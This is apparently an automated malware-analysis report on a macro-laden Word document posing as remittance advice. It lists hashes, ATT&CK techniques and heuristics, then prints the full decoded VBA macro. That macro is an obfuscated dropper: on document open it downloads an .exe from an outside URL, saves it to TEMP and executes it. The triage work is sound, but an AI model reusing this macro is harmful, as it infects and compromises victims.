Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 39302b664dd5a76e…

MALICIOUS

Office (OLE)

Size: 84.0 KB
Created: 2016-05-11 14:00:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: 326dbea2f99a1be3a60e4ad649587736
SHA-1: 11b2cb8384170b0e12a39f23d2a62e3365439591
SHA-256: 39302b664dd5a76e69399cff62e3f231570bfc36ef95b5ffb5550ea43069421a
Risk Score: 338

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, a common technique for executing malicious code as soon as the document is opened. Critical heuristics indicate the use of WScript.Shell and a Shell() call, suggesting the macro attempts to execute arbitrary commands or download further payloads. The document body presents itself as remittance advice, a lure intended to trick the user into performing an action, likely related to payment fraud.

Heuristics (11)

  • ClamAV: Doc.Dropper.Donoff-5743530-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Dim gFhrfphULi As String, qqQWMQOv As Integer
    Set RsRHOxt = CreateObject("WScript.Shell")
    End Function
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function BLwgX() As Object
    Set BLwgX = CreateObject("ADODB.Stream")
    End Function
  • CallByName call [high] OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Dim xtxWl As String
    OxyRpTO = CallByName(StJxh, WoVjdRAKfa, 2)
    End Function
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim ZPDPHnj As Integer
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Fake invoice / payment lure [low] SE_INVOICE_LURE
    Document contains invoice or payment language paired with an action verb; useful context when combined with link, macro, or attachment indicators.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9410 bytes
SHA-256: e120635caa70ea9e37afb29499d2698984d28df981310822032a308828415916
Detection
ClamAV: No threats found
Obfuscation or payload: likely
173 of 245 identifiers look randomly generated (e.g. 'D9n8ea6aJgcDGudvCdCQP1RI5pyipWMFD'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function lXiYi() As Integer
hFrQPtBp
iOEGGBQELK
lXiYi = 4779
End Function
Private Sub Document_Open()
Dim ZPDPHnj As Integer
auEprygAY.lKWcTTtPJ
End Sub
Private Sub IyTFndQ(ByVal tWaHbJWa As Integer)
kKhjcbO
If kbFfJcWPDT("5FjTr4lJor1mKl1h1JBVm6sU", 6938) Then
Vvqbl
fCDqvdI
tMRaXX 5233, "c4TFbvaAyIX5rWuREEh8ZkO", 762
End If
End Sub
Private Sub xpDvI(ByVal FwqWu As Integer, ByVal bKQsLfPtT As Integer)
WbFWObBP
End Sub
Private Sub charbjS(ByVal ouZXrRprh As String, ByVal WarvJN As Boolean)
hpyzkXXV "ZzKMg6L0yvZc1f9q6v2PJoAQPV", False, 6811
NhNNP 1698, 8412
If iqsSlw Then
HXncUHot "29PX0LE0fZL864UxOvYjjoi"
KvgAFCY
HSewNUUfX "3um6pEKi48VN7SZDmOp4i4Lai"
Else
eBXHSXxSTm
End If
XPKypJaPJ 6078, True, 3113
End Sub

Attribute VB_Name = "AhMxBWnqtk"
Public Function BLwgX() As Object
Set BLwgX = CreateObject("ADODB.Stream")
End Function
Public Function bAOYIYwzVu() As Object
Dim wdcRVtTy As Integer
Set bAOYIYwzVu = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Public Function RsRHOxt() As Object
Dim gFhrfphULi As String, qqQWMQOv As Integer
Set RsRHOxt = CreateObject("WScript.Shell")
End Function

Attribute VB_Name = "auEprygAY"
Private Function dZFlZbzB() As String
dZFlZbzB = soCxCNgfM.vEyNPDc("wRe3wspwowrnsr3erBow3dyw", "rw3")
End Function
Private Function EsjjF() As String
Dim KNnxjYxl As Integer
Dim XSqpMFANqW As Boolean
EsjjF = jgIuHteWrZ(NxslbV, gCNEPU, gCNEPU) & wkSHQDT
End Function
Private Sub yUKCDGN(ByVal kNqvTwNQ As String, ByVal VHgEamb As Boolean, ByVal JNSTSTzs As Integer, ByVal YSvyOrq As Variant)
Dim CRUQckgk As Boolean, CwzbrzK As Integer
Set khkEFNwpi = AhMxBWnqtk.BLwgX
IcHxH.pbSzXF 708, soCxCNgfM.vEyNPDc("Taayqpae", "7qa."), 3110, 1, khkEFNwpi
IcHxH.VfBUigVqkN soCxCNgfM.vEyNPDc("OXpresns", "r.Xtsu"), khkEFNwpi
IcHxH.xvkmxtH soCxCNgfM.vEyNPDc("EWrQi3EteE", "3QEN"), 6128, khkEFNwpi, YSvyOrq, rGdFp
IcHxH.YQIiss kNqvTwNQ, 2, bDTFPqASYt, khkEFNwpi
IcHxH.VfBUigVqkN bsfybGhP, khkEFNwpi
End Sub
Private Sub nXiGR()
Dim SPxvjqou As Boolean, OBfNwD As String
On Error GoTo UFFVJKr
jJZPfnZK 2612, EsjjF, yMMoecQyj
sBZbi EsjjF
RPCxFN = "f0hdcBgLhhKoSzKpHR3Fi"
Exit Sub
vkLGZ = 5682
UFFVJKr:
End Sub
Private Function rGdFp() As String
rGdFp = "CnzyqzlK02NiKl6u9f0"
End Function
Private Sub sBZbi(ByVal VVedtni As String)
IcHxH.xvkmxtH SXTEF, 6128, AhMxBWnqtk.RsRHOxt, VVedtni, zAbbQBDn
End Sub
Private Function zAbbQBDn() As String
zAbbQBDn = "mO0qpdr8ltDdA9zhvwHnvXdEfIETVq3qi"
End Function
Private Function jgIuHteWrZ(ByVal mbRPl As String, ByVal oYlYSIynSk As String, ByVal beruZwqxJz As String) As String
Dim RwsXvwx As String
JixRwEJkN = False
Set MJmjj = IcHxH.REnyVsUSe(soCxCNgfM.vEyNPDc("EW7nvFWiHro6Hnm7FeHnFt", "6H47WF"), False, 7872, AhMxBWnqtk.RsRHOxt, soCxCNgfM.vEyNPDc("wPR6Od6CdESwiS", "xdtw6i"))
jgIuHteWrZ = MJmjj(mbRPl)
End Function
Private Function yMMoecQyj() As String
Dim AUjlAPk As Boolean
Dim jdqfOANBzu As Boolean
yMMoecQyj = BFppclZqB
End Function
Private Function SEcuPpcS() As String
NXgcHedZ = "DKva5T1tzt9uNk8v4XRls0dGWsm"
SEcuPpcS = soCxCNgfM.vEyNPDc("S2Ce2nd2", "2Co")
End Function
Private Function BFppclZqB() As String
BFppclZqB = soCxCNgfM.vEyNPDc("hXt8XtpX:X/XX/Xol80c0ayX0f0o0to8g0r8XafX.0c0o0mX/08sy8s08t0e8m/0c0Xa8ch08e/88wXo8r0d.8e8x08e", "0X8")
End Function
Private Function wkSHQDT() As String
Dim osqqg As String
wkSHQDT = PgjYTcLSA
End Function
Private Function bsfybGhP() As String
bsfybGhP = soCxCNgfM.vEyNPDc("Ciliopiske", "tkpi")
End Function
Private Sub cWunX(ByVal IdapnfkR As Integer, ByVal GnovfyogN As Boolean)
nlzlivrN 5254, False, False
bHCdDp True, 2221
dKGQB 8006, True, 7782
If fCAhhnf(9180) Then
XWIMFEtxub False
IXexmLYhXX
VDDMzyez 9562
Else
gcJTlZZrR 2876, False
End If
ihWWxOEu 7730, True, "XoamEjGkrsULGIYVxAdTAtN"
End Sub
Private Function SXTEF() As String
JywcHztmR = "zRHMmUrWttZzZ9pZy0DhYO2ZT"
SXTEF = soCxCNgfM.vEyNPDc("rEWxteWc", "1rWt")
End Function
Private Function xOZypMMv() As String
If pjTUCKd(5843, "WJkEt1QVkfJatERcy") Then
zeMphePZDz 1173, "zWo3eg5qzn72lf0oXj"
zUtoVINdP 2806, "D9n8ea6aJgcDGudvCdCQP1RI5pyipWMFD", 559
jvyLJjMjyn
End If
xOZypMMv = "bNUq5BQ0ZBhpt9kbPuBaAnrch"
End Function
Private Function FQymqif() As String
FQymqif = soCxCNgfM.vEyNPDc("MZPoZziZPllPaPx/5xZ.0ZP P(xcoZmZpxaPtZZiZbZlZe;xx PMZSxIPE ZP9.Px0;PZ PWxinxxdPowPsPP PNPTP P7Z.1x;x PxTrxPixdePxnZt/P5x.P0P)P", "PxZ")
End Function
Private Function Xjuzm() As String
Xjuzm = soCxCNgfM.vEyNPDc("OXpresns", "r.Xtsu")
End Function
Private Sub jJZPfnZK(ByVal tisIc As Integer, ByVal GefBHbzaXv As String, ByVal FaoowUobC As String)
Dim cLion As Integer, QmSSGLrIL As Integer
Set hGAjCtoVF = AhMxBWnqtk.bAOYIYwzVu
vAhuigCxLB = "9xhByeXuU4T8HBZF8Hhk5uhAYB"
IcHxH.SmzXbpy False, soCxCNgfM.vEyNPDc("6GE Ta", " a96S"), False, FaoowUobC, Xjuzm, hGAjCtoVF
IcHxH.YQIiss soCxCNgfM.vEyNPDc("U.sNeTNrN-ANgNTenNt.", "mT.N"), FQymqif, soCxCNgfM.vEyNPDc("SDe3tQKRKeqPuDPePst3HDDeaQd3eKDr", "QPD3K"), hGAjCtoVF
IcHxH.VfBUigVqkN SEcuPpcS, hGAjCtoVF
yUKCDGN GefBHbzaXv, True, 3347, IcHxH.OxyRpTO(hGAjCtoVF, dZFlZbzB)
End Sub
Private Function PgjYTcLSA() As String
PgjYTcLSA = soCxCNgfM.vEyNPDc("/oo86ioeh7h1i8i1bh6on9nbenn41oic3i.iheoxoe", "ohin")
End Function
Public Sub lKWcTTtPJ()
Dim SqJSN As Integer
nXiGR
End Sub
Private Function khqaO() As Integer
WmkFh
cIsPekWV 9366
khqaO = 9266
End Function
Private Function gCNEPU() As String
gCNEPU = "ZsQRpJyqrEfx0pahbORP4CIPxKWxB8"
End Function
Private Function bDTFPqASYt() As String
bDTFPqASYt = soCxCNgfM.vEyNPDc("6Sakbve66T6oFbkibl6e", "6kb")
End Function
Private Function NxslbV() As String
NxslbV = soCxCNgfM.vEyNPDc("ZTEZIMPZ", "ZoWIO")
End Function

Attribute VB_Name = "gfYLB"
Private Sub fCYrmmp(ByVal KHSZKSELI As String)
XHvfGalf
BZbDy False, True, 5361
End Sub
Private Sub meivLAFp()
UKUhJchCfN False
UOlvZCoKSe "lPgLNAgVIX6iGi8oYQ", 3119
BWDat "IBlZXr1cC7xCrTXSY"
End Sub
Private Function EwykVwBOmO(ByVal MPRjdx As String, ByVal PvrVyPhX As String) As Boolean
UiaKS 8628
jalCYyVT
wbAhL 7029
EwykVwBOmO = True
End Function
Private Sub THUJA(ByVal vxUtLeX As Boolean, ByVal oajGKRL As String)
mokZnpH
HulbI "oacgqxYhSECRMY4eq"
End Sub
Public Function dnBNLei(ByVal MvdRYUs As String, ByVal AIRHvAL As String, ByVal GYaCQeX As Integer) As Boolean
Dim nRofJwYlF As Boolean
dnBNLei = InStr(1, AIRHvAL, MvdRYUs)
End Function
Public Function OnRDVW(ByVal WNvRt As String, ByVal GwdDFPw As Integer) As String
Dim KTkUIkFCNQ As Boolean
Dim FAWvHmr As Boolean
OnRDVW = Mid(WNvRt, GwdDFPw, 1)
End Function

Attribute VB_Name = "IcHxH"
Public Function OxyRpTO(ByVal StJxh As Object, ByVal WoVjdRAKfa As String) As Variant
Dim xtxWl As String
OxyRpTO = CallByName(StJxh, WoVjdRAKfa, 2)
End Function
Public Sub YQIiss(ByVal AWdDQXq As Variant, ByVal kUTFuiOT As Variant, ByVal dVNMpzEm As String, ByVal AXtBhR As Object)
CallByName AXtBhR, dVNMpzEm, 1, AWdDQXq, kUTFuiOT
End Sub
Public Sub xvkmxtH(ByVal kfMoXx As String, ByVal KOrQktg As Integer, ByVal oQsYFaipbj As Object, ByVal zSNkARtup As Variant, ByVal pjLwYjHcHG As String)
Dim kpyPvtMf As Boolean, YoAekV As String
CallByName oQsYFaipbj, kfMoXx, 1, zSNkARtup
End Sub
Public Sub VfBUigVqkN(ByVal sqQziJwCV As String, ByVal zQtloNToEj As Object)
Dim WHHPra As Integer, klFXu As Integer
CallByName zQtloNToEj, sqQziJwCV, 1
End Sub
Public Sub SmzXbpy(ByVal ZmiGKjq As Variant, ByVal YMxYm As Variant, ByVal VZqoptNc As Boolean, ByVal ogEFVZ As Variant, ByVal ZxlAx As String, ByVal rYmhaGJjfR As Object)
Dim qgeAaTMvRR As Boolean
OWoNkkz = "pfDcWhis0AOoI5zRyACmudMYD4"
CallByName rYmhaGJjfR, ZxlAx, 1, YMxYm, ogEFVZ, ZmiGKjq
End Sub
Public Function REnyVsUSe(ByVal UqIzKPrw As String, ByVal LCyerT As Boolean, ByVal hRehlfcJ As Integer, ByVal rYmhaGJjfR As Object, ByVal dHMvg As String) As Variant
Set REnyVsUSe = CallByName(rYmhaGJjfR, UqIzKPrw, 2, dHMvg)
End Function
Public Sub pbSzXF(ByVal YwvQDL As Integer, ByVal GHFpuhEmqy As String, ByVal blmJbadm As Integer, ByVal KrfhkIQ As Variant, ByVal CuQNug As Object)
Dim wYgUzAg As Integer, oViydMyrTP As Integer
xAnXsgtN = False
CallByName CuQNug, GHFpuhEmqy, 4, KrfhkIQ
End Sub

Attribute VB_Name = "soCxCNgfM"
Private Function AmBcob() As Boolean
puBqPC False, "wcHmthIEmg8DzeiqikJFtX8aSt"
AmBcob = True
End Function
Private Sub dMsbUxo(ByVal LdovjYvQ As String, ByVal aTrLc As Integer)
oRQsMB
End Sub
Public Function vEyNPDc(ByVal CbYXQ As String, ByVal ESrwfOX As String) As String
Dim UNuqY As Boolean, JgXpwpW As String
For IDypBIHSaE = 1 To Len(CbYXQ)
UNuqY = gfYLB.dnBNLei(gfYLB.OnRDVW(CbYXQ, IDypBIHSaE), ESrwfOX, 638)
MWgdETofR = 5559
If Not UNuqY Then
vEyNPDc = vEyNPDc & gfYLB.OnRDVW(CbYXQ, IDypBIHSaE)
LICDvxAOy = 7085
End If
Next
End Function
Private Function fNLPNyer() As Boolean
RiNRh 3745
fNLPNyer = True
End Function
Private Function oiIXlLkw(ByVal kEGKxM As Integer, ByVal MwVzL As Integer) As String
wzDcvaHzAL "FGu2ctX0CTLhs2iTdp5ZKy"
lLNzEN 414
yvqqniWt 6874, False, True
oiIXlLkw = "2VN10NB0l4aEcke4j1Ius"
End Function